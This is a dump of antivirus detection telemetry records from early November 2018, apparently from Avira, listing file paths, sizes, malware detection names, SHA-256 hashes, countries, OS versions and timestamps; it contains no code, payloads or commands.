  Row(detection=Row(filename='avscan-20181102-054740-c7a7caa4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054740-C7A7CAA4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051059-a8082bb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051059-A8082BB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051858-c5a05558', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051858-C5A05558', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053542-1bbd7d27', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053542-1BBD7D27', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060400-0fd45e12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060400-0FD45E12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051055-a5de9f97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051055-A5DE9F97', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050438-c4eddf56', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050438-C4EDDF56', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053520-0ecfeac1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053520-0ECFEAC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053009-553f86dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053009-553F86DC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053603-288af38a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053603-288AF38A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055519-d9889a0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055519-D9889A0F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052123-1c2f4811', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052123-1C2F4811', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060457-3236897e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060457-3236897E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060252-e791b218', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060252-E791B218', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061145-24f5be78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061145-24F5BE78', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061602-be2a483d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061602-BE2A483D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062542-180717af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062542-180717AF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061128-1b021fa8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061128-1B021FA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055518-d8a69e2c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055518-D8A69E2C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061604-bf98210f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061604-BF98210F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052649-de777b77', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052649-DE777B77', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062029-5d8ac69b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062029-5D8AC69B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061155-2b62c9e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061155-2B62C9E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053827-7e34789d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053827-7E34789D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062138-86e3f8f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062138-86E3F8F6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051914-cf121eeb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051914-CF121EEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055957-7ef104e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055957-7EF104E6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054453-6448485d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054453-6448485D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061534-ade7e6a4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061534-ADE7E6A4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062406-dee2a9f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062406-DEE2A9F9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062256-b5090ad6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062256-B5090AD6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:31:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051117-b2cbc5b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051117-B2CBC5B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054148-f5d6a7ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054148-F5D6A7ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054334-354b6ade', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054334-354B6ADE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055754-35ed0fa1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055754-35ED0FA1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062356-d8fedaad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062356-D8FEDAAD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053358-ddf8cddb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053358-DDF8CDDB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061550-b711444f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061550-B711444F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050302-8bc9e21b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050302-8BC9E21B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='76ae25a7110cae394c1bbe6ea856871fe9cd525bd0e41e2e495e2e90d790701d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\76AE25A7110CAE394C1BBE6EA856871FE9CD525BD0E41E2E495E2E90D790701D', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='76ae25a7110cae394c1bbe6ea856871fe9cd525bd0e41e2e495e2e90d790701d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060930-d4b85b21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060930-D4B85B21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051743-98f2820b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051743-98F2820B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:14:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T23:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051721-8bd6243a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051721-8BD6243A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T19:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4 (m.fertiaz).bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\FD PAK HERMAN\\Hari 4 (M.Fertiaz)\\4 (M.Fertiaz).bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='skse_loader.exe', filepath='C:\\Users\\X\\Desktop\\Ablage\\skse_1_06_16\\skse_loader.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='17e26c7fc5bae6864a898278a4229b223706b7e2ab7b7ab543f0d06c46223503', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:m7q6Ck3JIUCADdP8.1', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:46:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-11-52-10.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T14:02:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='training hse.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\PERSIAPAN AUDIT\\TRAINING HSE\\TRAINING HSE.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T16:57:28Z'), dt=datetime.date(2018, 11, 1)),
